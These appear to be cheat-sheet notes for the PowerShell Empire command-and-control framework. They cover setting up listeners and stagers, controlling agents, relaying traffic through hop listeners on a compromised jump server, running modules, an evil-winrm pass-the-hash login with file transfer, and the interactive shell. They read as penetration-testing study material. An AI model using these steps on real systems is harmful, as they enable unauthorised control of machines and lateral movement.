# POWERSHELL EMPIRE C2 FRAMEWORK 

## LISTENERS

### Listeners in Empire are used to receive connections from stagers.  The default listener is the HTTP listener. This is what we will be using here, although there are many others available. It's worth noting that a single listener can be used more than once -- they do not die after their first usage.

#### Listener selection: uselistener LISTENER

#### Listener options: options, set OPTION VALUE, set Name NAME, set Host OUR_IP, set Port OUR_PORT

#### Launch listener: execute

#### Stop listener: kill LISTENER_NAME

#### Exit out of this menu: back, Main menu: main

## STAGERS

###  Stagers are Empire's payloads. They are used to connect back to waiting listeners, creating an agent when executed.

### We can generate stagers in either Empire CLI or Starkiller. In most cases these will be given as script files to be uploaded to the target and executed. Empire gives us a huge range of options for creating and obfuscating stagers for AV evasion; however, we will not be going into a lot of detail about these here.

#### Stager generation: usestager (Include space to get a list of available stagers in a dropdown menu)

#### General purpose stager: multi/launcher

#### Specify stager: usestager multi/launcher

#### Stager options: options, set OPTION VALUE set Listener LISTENER_NAME, execute

## AGENTS

#### Agent setup: Copy and paste stager to a script (name of your choice) and then transfer it on to the machine. Or just copy/paste the entire script to compromised machine to connect to the C2 server.

#### Agent interaction: agents (See full list of available agents), interact AGENT_NAME then help (Check your options to execute on compromised machine)

#### Switch back to agents menu: back

#### Kill agent: kill AGENT_NAME

#### Rename agent: rename AGENT_NAME NEW_AGENT_NAME

## HOP LISTENERS

### Hop Listeners create what looks like a regular listener in our list of listeners (like the http listener we used before); however, rather than opening a port to receive a connection, hop listeners create files to be copied across to the compromised "jump" server and served from there. These files contain instructions to connect back to a normal (usually HTTP) listener on our attacking machine. As such, the hop listener in the listeners menu can be thought of as more of a placeholder -- a reference to be used when generating stagers.

#### Listener creation: uselistener http_hop

#### Hop Listener setup: set RedirectListener FIRST_LISTENER_NAME, set Host COMPROMISED_IP set Port PORT(Above 15000)

#### Execute

#### Generate stager for hop listener: use multi/launcher set Listener http_hop

#### Copy/paste payload to target's command line

## START JUMP SERVER

### Example:

#### mkdir /tmp/hop-EXAMPLE

#### cd /tmp/hop-EXAMPLE

#### Attacker: cd /tmp/http_hop && zip -r hop.zip

#### Transfer the zipped file to compromised machine
 
#### Compromised machine: unzip hop.zip

#### Compromised machine: Create a web server to host the payloads generated by the framework: php -S 0.0.0.0:PORT (Above 15000) &>/dev/null &

## MODULES

#### Module usage on an empire agent: usemodule /PATH/TO/MODULE

#### usemodule: Shows list of modules to be used on target

#### When we choose the module we want to use type: options

#### Configuration: set agent AGENT_NAME, execute

## INCLUDE EMPIRE SCRIPTS ON A REMOTE MACHINE

### Scripts location: /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/

#### evil-winrm -u Administrator -H HASH -i IP -s EMPIRE_DIR

#### download REMOTE_PATH LOCAL_PATH

#### upload LOCAL_PATH REMOTE_PATH

## INTERACTIVE SHELL

### The interactive shell was a new feature in Empire 4.0. It effectively allows you to access a traditional pseudo-command shell from within Starkiller or the Empire CLI Client. This can be used to execute PowerShell commands, as you would in a Powershell reverse shell.

#### shell: Access an interactive shell by typing it on an agent. CTRL+C to return rto shell menu.
